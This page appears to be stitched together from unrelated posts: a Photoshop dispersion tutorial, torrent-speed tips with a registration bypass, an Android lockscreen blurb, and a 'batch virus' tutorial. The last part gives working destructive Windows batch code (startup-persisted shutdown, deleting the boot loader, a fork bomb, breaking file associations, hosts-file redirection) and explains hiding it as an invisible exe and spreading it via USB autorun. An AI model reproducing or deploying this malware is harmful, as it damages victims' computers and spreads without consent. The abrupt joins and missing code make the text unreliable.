How to Create an Easy Dispersion Effect in Photoshop

Giving a subject a dispersion or splatter effect can create an incredibly dynamic image. The best part is, it’s very quick and easy to do with a few Photoshop brushes, but the end result can look very complex as if it took you hours to create. In this tutorial, I’m going to walk you through 3 easy steps to create this dispersion effect.

Step 1

After a little bit of searching I found this photo of a guy jumping in the air by Camera Eye Photography. This is a great photo for this effect because the subject is in motion. So our dispersion effect will help to enhance that motion.

Copy and paste the photo into a new PS document. I sized mine down to 2500px wide. Using the Quick Selection Tool (W), I made a selection of the guy and copied and pasted him to a new layer. I then loaded the selection again, and with the background layer selected, I chose (Edit | Fill | Content Aware).

Content Aware did a pretty good job of removing the guy from the background. There is still a silhouette visible, but that’s okay, we’ll be covering most of it up. We just want some of the background color to show through. If you’re extra picky, you can remove the silhouette with the Clone Stamp Tool (S).

Step 2

Lets go ahead and duplicate the guy layer one time. So you should have two layers that have our guy jumping. Select the bottom most guy layer and press (Cmd+T) to transform him. You want to stretch the guy horizontally.

I roughly selected his arm and leg and moved them back to the edge of the non-distorted guy in the layer above. The idea here is that we’re giving a color area for our splatters to pick up via a mask.

Lets go ahead and create that mask for the distorted guy layer. Select the distorted guy layer and click the layer mask icon at the bottom of the layers palette. Fill the mask with solid black.

Now use the splatter brushes to reveal portions of the layer by clicking the mask using solid white as the foreground color.

For the top non-distorted guy layer, we also want to create a layer mask. But this time we want to leave it solid white, and use a black splatter brush to remove portions of the guy to reveal some of the background.

Pretty easy, huh?

Step 3

For the final touches lets add a bit of vignette and highlight. But before we do that… I took one large dark splatter and placed it on a layer behind the guy. I basically just wanted to see some light splatters that fell beyond the distorted guy’s layer mask.

For the vignette, lets switch over to Quick Mask Mode (Q), and choose a very large soft black brush and click once in the center of the image.

Switching out of QMM you’ll see that we have a selection that excludes the very center of the image. The selection is also nicely feathered due to our soft black brush.

Now create a new Levels Adjustment Layer above all other layers, and adjust as follows.

For the final touch, lets add a highlight. Create a new layer above the guy layer, and set its blending mode to Opacity. Now with a soft white brush make 1 or two clicks over the guys head and torso. You may need to reduce the opacity of this layer down to 50% or 60% depending on how hot the highlight appears.

Download torrents using idm !!

You might have noticed that direct downloads are much faster than torrent downloads. This is because torrent speed is dependent on other peers (seeders) containing the file. But direct downloads have a direct connection to the server containing the file and hence no speed restictions. Now it's possible to download your favorite torrent at full speed using the best and the most widely used direct download acclerators in the world which is none other than IDM or Internet Download Manager.

How? Read on.. 
 

You'll need: 

•  Internet Download Manager 

•  The .torrent file or the magnet URL of the torrent file that you want to download.

HOW DO THEY DO IT :

There are 2 good websites that let you download torrent files via IDM, namely : zbigz and boxopus. What these sites do is that they simply download the torrent files to their own servers. Since download speed is not a restriction for them, the requested file is downloaded to their server in a few seconds and now you can download it from them without any hassles whatsoever.
 



I. Zbigz

The First one is zbigz. Although zbigz has a speed limit of 100kb/sec for high speed downloading with idm, it has no need for registrations whatsoever. You can just start using it, right away.

So if you want to try out zbigz then just follow the instructions : 

1. Install IDM 

2. Go to www.zbigz.com

3. Paste the magnet url of the torrent you want to download. or alternatively upload .torrent file 

4. Click Go. 

5. Choose Free. 

6. Wait for a few seconds while zbigz to caches your torrent file. 

7. Wait for zbigz to ZIP your download.

8. Click download once the zipping is done. 

9. As soon as you click download, IDM's download window should pop up. Choose your save location and start the download. 

10. You can pause and resume the download whenever you want, just like your torrent client.





II. Boxopus

The second one is boxopus. Boxopus downloads your torrent files and puts them in your dropbox account which means that in order to use boxopus you need a dropbox account too.

Also boxopus requires registration via invite code only which is not a problem because their is a trick to get around it.

First, Go to http://boxopus.com/ and click on the little Register Link. Now in the second TextBox, enter your Email ID and hit Submit.

 

In the new confirmation section, click on the Facebook Icon next to the text "Sign In via Social Services" and log in to the app using your Facebook Credentials. You'll be asked to enter your Email ID once again. Enter the same ID you entered before, and voila! you are registered.

1. Now that you are in boxopus, paste the url of the torrent you want to download. If you don't have    the url and if you want have the .torrent file on your hard disk, click "Put it in my Dropbox" 

2. Wait for boxopus to cache your torrent file. This may take a while.

3. Once it's done, click download.

THIS METHOD WORKS MOST THE TIME BUT NOT ALL THE TIME

It has happened quite often to all of us that when we want to download a old torrent file it has very less seeds or no seeds at all Although you can also download a torrent file using the download acclerator, IDM but lets give this one a try, shall we?

Trackers are responsible for the number of the seeds. So if you don't have enough seeds means that your trackers was able to track only those many seeds for your file and hence the solution is to put more trackers which will increase the number of seeds and hence the download speed. You can also boost your torrent download speed by tweaking your software's settings or by using CheatEngine.

[ A seed (or seeder) is anyone who has one complete copy of the file being shared across the torrent network. A leech (or a leecher) is the person who does not have the complete file yet but has joined the network to download it. A leecher becomes a seeder when he downloads the entire file and then shares it across the network.]

For example in this torrent file,

Here, 

•  I have 1 seeds and 7 leechers.
•  I have only one tracker.
• Peer Exchange, Local peer Discovery and Enable DHT are checked by default.

Now, download these EXTRA TRACKERS and copy them in the torrent's tracker field.

[Right click on the torrent and select properties and copy the extra torrents into the tracker field]

Which is what i did and now notice the change..

• My seeds have gone up to 44.
• I have set the maximum upload rate to 1kbps
• I have copied the trackers from 'extra trackers.txt' file into the tracker field.

As your seeds will go up, your download speed will automatically go up till the limit set by your ISP.

6 ways to speed your torrent download tremondously !!

The internet is flourishing with numerous peer to peer (p2p) clients but the two most used file sharing clients are uTorrent and BitTorrent. Althoughyou can also download torrent files through IDM, BitTorrent and uTorrent are the most widely used file-sharing clients. 

Although they both are quite similar to each in terms of user-interface, I personally prefer uTorrent more because the BitTorrent client at times causes data loss due hash fails and also because uTorrent has a smaller memory footprint, meaning that uTorrent uses minimal computer resources while offering functionality comparable to larger BitTorrent clients.

However, no matter what torrent client you are using, they all seem to share one common user complaint and that being the torrent downloading speed being much lower than the direct download speed.

There are several ways to boost your torrent downloading speed:

I.   Making changes in the software settings [uTorrent / BitTorrent ONLY]

II.  Using CheatEngine 

III. Using TCP Optimizer.

IV. Using Google DNS and OpenDNS

V.  By Manually Adding Trackers

VI. Downloading the Torrent using IDM

  

Before we start with the 1st method it is important to understand that to get great results with your torrent download speed, make sure that your torrent has a significant number of seeders as compared to the numbers of leechers.

If the number of seeders of the torrent is much lower than the number of leechers then the actual downloading speed will be much less then what you'd expect. To increase torrent downloading speed in such seed-less torrents you'd have to increase the seeds by manually adding trackers.

I:  Tweaking the Settings

NOTE: These settings modifications are specific to uTorrent or BitTorrent only because they are the most used file sharing clients in the world. However, if the settings of your torrent client seem similar to the ones specified below you may test it out.

1. Select "Options" and click on "Preferences".

2. Go to "General"

(i)  Pre-allocate all files                          - CHECKED
(ii) Append .!ut to incomplete files        - UNCHECKED

3. Go to "Connection" and check the following settings:

     

(i)* Enable UPnP port mapping            - CHECKED
(ii)  Enable NAT- PMP port mapping    - CHECKED

(iii) Add Windows Firewall exception   - CHECKED

(iv) Randomize port on each start          
-If you do not have a firewall or router or/and you want an extra layer of security then you can check this option. However checking this option may lead to small delay in download start depending whether your client has found a working port or not. 

*NOTE: Some other tutorials advice that you uncheck the "UPnP port mapping" option. Unchecking that option honestly did not work out for me. On the other hand my download speed started fluctuating like crazy. While unchecking it has worked out fine for other users, it hasn't for some. Hence, i'd advice you to test this option on your own and check/uncheck it accordingly.

4. Now select "Bandwidth".

(i)  Maximum upload rate                                                    - 1 (1 kbps)
(ii) Maximum download rate                                                - 0 (Unlimited)

(iii) Global maximum number of connections   
-Give it a high number like 500 etc. but not too high otherwise it will use up your bandwidth and slowdown the downloading process.

(iv) Maximum number of peers connected peers per torrent  
- Give it a high number like 500 etc. 

(v) Number of upload slots per torrent  
- 3 [Giving it a much lower number affects the download speed too]

(vi) Use additional upload slots if upload speed <90%          - UNCHECKED


5. Now select "BitTorrent".

Except for protocol encryption, by default most of the important options are checked already, but still check if the options mentioned below are checked or not.

(i) Protocol Encryption                                                           ENABLED
(ii) Enable DHT network                                                        CHECKED
(iii) Enable DHT for new torrents                                           CHECKED
(ii) Enable Local Peer Discovery                                           CHECKED
(iii) Enable Peer Exchange                                                    CHECKED
(iv) Ask tracker for scrape information                                   CHECKED
(v) Allow incoming legacy connections                                  CHECKED



6. Select "Advanced"

(i) net.max_halfopen                                                           - 50



[OPTIONAL]
6. Select "Apply" to apply all the modified settings and click "Ok" to get out of "Preferences". Now again select "Options" and go to "Setup Guide"

The setup guide has an option to "run tests" which automatically tests your network and configures itself for the best performance. Although µTorrent already does this when you first install the software but if you still want to ticker with this option you can go ahead and do so. Please note that this will also reset your port number and uTorrent bandwidth settings hence you should take note of your previous settings before you explore this option. By the way i am using port number 41682 so you can use this if nothing works out for you.





II. Improving Torrent Downloading Speed with CheatEngine.


CheatEngine is a free to download, open source tool that can be used to boost the torrent downloading speed using it's "speedhack" feature. If tinkering with settings as discussed in the previous method did not work out for you, you might want to give this one to try.



Step 1 : Download CheatEngine from www.cheatengine.org

Step 2 : Open uTorrent and then open CheatEngine as administrator and click on the computer icon on the extreme top-left side of the window as depicted in the screenshot.

Step 3 : It will show you a list of on-going processes. Select the torrent client   that you are using from the list of processes and then click on "Attach debugger to process" and select "yes" when you are asked for confirmation.

Step 4 : Now click on "Enable Speedhack". Once that option is checked, enter   values 0.1 or 0.5. The default value "1" makes no change to the download speed whatsoever. Reportedly, 0.1 value increases the download by 10 times and 0.5 by 50 times. After entering a value, click on "Apply".

Ubuntu Lockscreen is the work of XDA developer Rotary Heart, who's been working pretty tirelessly on the project for a while now. The lockscreen is designed to emulate the look of Ubuntu Touch, and notifications appear in the center of the animated circle just under the clock on screen. Right now the app supports notifications for SMS and missed calls, but the developer is adding Facebook, WhatsApp, email, and system notifications in the next update. It also supports music playback controls, so you can pause and skip songs without unlocking your device.

It's definitely in beta, so you may run into some bugs (in which case, definitely report them at the XDA thread below), but overall it works like a charm. Make sure to disable your stock or current lockscreen before using it though, otherwise this will just add a second lock screen on top of the one you have. what are batch programs ?

 

A batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run. 

What can batch viruses do ?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (you can name anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.  Application Bomber

@echo off // It instructs to hide the commands when batch files is executed

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder

This code would start creating windows user accounts whose names could be any random numbers. 

3.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”  

copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”    //these two commands will copy the batchfile in start up folders (in XP)

shutdown -s -t 00  //this will shutdown the computer in 0 seconds  

Note : Files in Start up folder gets started automatically when windows starts .  You should  first two lines of  code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder. 

4. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View

Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply 

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows. 

 Lets make a batch file to 

delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr   // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively

del ntldr    //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again. 

5. Fork Bomb

%0|%0  //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

                     

6. Extension Changer

@echo off

assoc .txt=anything // this command associates extension .txt with filetype anything.

assoc .exe=anything

assoc .jpeg=anything

assoc .png=anything

assoc .mpeg=anything                          

Every extension is associated with a filetype like extension ‘exe’ is  is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

 Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

7.  DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts  file.

Replace xxx.xxx.xxx.xxx  and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Note : Most of the batch viruses are simply undetectable by any anitiviruses

Tip : Coding good viruses just depends on the DOS commands you know and logic you use.

   

Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.

2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.

After running converter ,  open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.  

                     

You can  use other options as per your requirement. 

Spreading batch viruses through pen drive -:

Step 1. 

Open notepad and write 

[autorun]

open=anything.bat

Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
